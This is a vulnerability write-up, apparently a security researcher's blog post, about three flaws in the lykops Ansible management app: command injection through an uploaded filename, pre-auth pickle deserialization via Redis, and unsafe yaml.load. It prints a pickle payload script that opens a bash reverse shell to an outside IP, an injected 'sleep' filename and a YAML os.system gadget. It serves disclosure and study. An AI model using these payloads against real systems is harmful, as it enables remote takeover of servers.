跳至主要内容

lykops has multiple vulnerabilities

corresponding 0x00    intro

- github repo:https://github.com/lykops/lykops
- 121 stars and 65 forks til 2021/2/6





0x01    Post-Auth OS-command injection

lykops/library/utils/file.py#248 ->upload_file()





we got lykops/lykops/ansible/yaml.py#74,github link here

vuln param file comes from our HTTP Request in array of FILES[] 


So we can completely control the unsantized param, and cause a OS-cmd injection


  1. the corresponding route is ^ansible/yaml/import$, we can trigger this vuln by visiting it.
  2. Also, you can see that an exception will trigger twice invocations  of import_file(),which means a `sleep 5`  command will casue a delay of 10 second


POST /ansible/yaml/import/ 
Host: lykops
...

...
...;filename="test.txt$(sleep 5)"
...



0x02    Pre-Auth pickle Unserialized RCE via Unauthorized Redis

route of Login,is ^login.html,the corresponding implementation is Login->login function


Follow up get_userinfo , it is found that the user's login cache is retrieved from Redis.


Line 81, passed in user=adminuser Variable, we get it by searching the variable name globally adminuser The default value is lykops





Further, Redis uses String , in order to convert to Python Object , there must be a deserialization implementation. 
If The deserialization restriction is improper, there will be a vulnerability-what function does it use to deserialize? 


pickle.loads! this evil function! 

This get The implementation of, in the input parameter is fmt=obj When deserialization from Redis achieved in 字符串 ], and the deserialization function is actually used pickle.loads !

If you are not familiar with Python deserialization attacks, see python deserialization attacks from scratch This post.

The following figure shows a demo that uses deserialization to run commands in Python cmdline. 







So the script for generating the payload is as follows:

#!/usr/bin/env python3
import pickle
import os

class py():
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/10.10.111.2/1337 0>&1',))

payload = pickle.dumps(py()) 
# b'\x80\x03cposix\nsystem\nq\x00X)\x00\x00\x00bash -i >& /dev/tcp/10.10.111.1/1337 0>&1q\x01\x85q\x02Rq\x03.'

#!/usr/bin/env python3
import pickle
import os

class py():
  def __reduce__(self):
    return (os.system, ('bash -i >& /dev/tcp/10.10.111.2/1337 0>&1',))

payload = pickle.dumps(py()) 
# b'\x80\x03cposix\nsystem\nq\x00X)\x00\x00\x00bash -i >& /dev/tcp/10.10.111.1/1337 0>&1q\x01\x85q\x02Rq\x03.'











0x03    Post-Auth YAML Unserialized RCE

Firstly, people should know that unproperly use yaml.load
will cause Python Arbitrary Object  Loads, which in most cases means a RCE.

To find original tutorials, visit the tutotials of https://pyyaml.org/wiki/PyYAMLDocumentation#Tutorial

Loading YAML

Warning: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function. Check the yaml.safe_load function though.


Searching for yaml.load and got this , library/utils/yaml.py#27 , github link here





























invocation is from yaml_loader (), which is trigged in upload function

!!python/object/new:os.system ["sleep 2"]

So we got an Post-Auth RCE
























the sorce is in  library/utils/file.pygithub link here










标签:

评论

  1. 匿名2022年1月23日 14:55

    Bet on Sports Online Betting with the Sportsbook - Tềng ĐỀng Đạng
    ➨ We offer betting with best odds with great ボンズ カジノ live betting. 1xbet Online sports betting is one of the most popular ways sbobet ทางเข้า of

    回复删除

发表评论

此博客中的热门博文

MKCMS V6.2 has mutilple vulnerabilities

0x00:Lead In Source code can be downloaded  at  https://www.lanzous.com/ib7zwmh This CMS is kinda funny, coz there is a universal filter addslashes  in /system/library.php /system/library.php <?php ... if ( ! get_magic_quotes_gpc ()) { if ( ! empty ( $_GET )) { $_GET = addslashes_deep ( $_GET ); } if ( ! empty ( $_POST )) { $_POST = addslashes_deep ( $_POST ); } $_COOKIE = addslashes_deep ( $_COOKIE ); $_REQUEST = addslashes_deep ( $_REQUEST ); } function addslashes_deep ( $_var_0 ) { if ( empty ( $_var_0 )) { return $_var_0 ; } else { return is_array ( $_var_0 ) ? array_map ( 'addslashes_deep' , $_var_0 ) : addslashes ( $_var_0 ); } _var_0 } While it uses stripslashes somewhere by mistake, let's do a global search about it, we get 3 SQL injections 0x01:PreAuth SQL injection in /ucenter/repass.php MKCMS V6.2 has SQL injection via the /ucenter/repass.php nam
发表评论
阅读全文

Thinksaas has a Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php

1. Intro of this CMS The repo of ThinksaasS is located at https://github.com/thinksaas/ThinkSAAS , quite a common-used CMS. Source code of v3.38  could be downloaded at https://www.thinksaas.cn/service/down/ , while passcode of downlaoding is thinksaas9999 of this Vuln ThinkSAAS before 3.38 has SQL injection via the /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC title parameter, allowing remote attackers to execute arbitrary SQL commands. 2. Walkthrough Code Review Risky lines are here =>   https://github.com/thinksaas/ThinkSAAS/blob/b0361f49cb026ad33b7df6b15539bec6dadd24b0/app/topic/action/admin/topic.php#L42 https://github.com/thinksaas/ThinkSAAS/blob/b0361f49cb026ad33b7df6b15539bec6dadd24b0/thinksaas/tsApp.php#L146 Due to unproper conjunction of SQL query sentences (1) and invalid filter (2) (1) unproper conjunction of SQL query sentences app/topic/action/admin/topic.php#L42 Let's see how findAll() works: thinksaas/tsApp.php#L1
4 条评论
阅读全文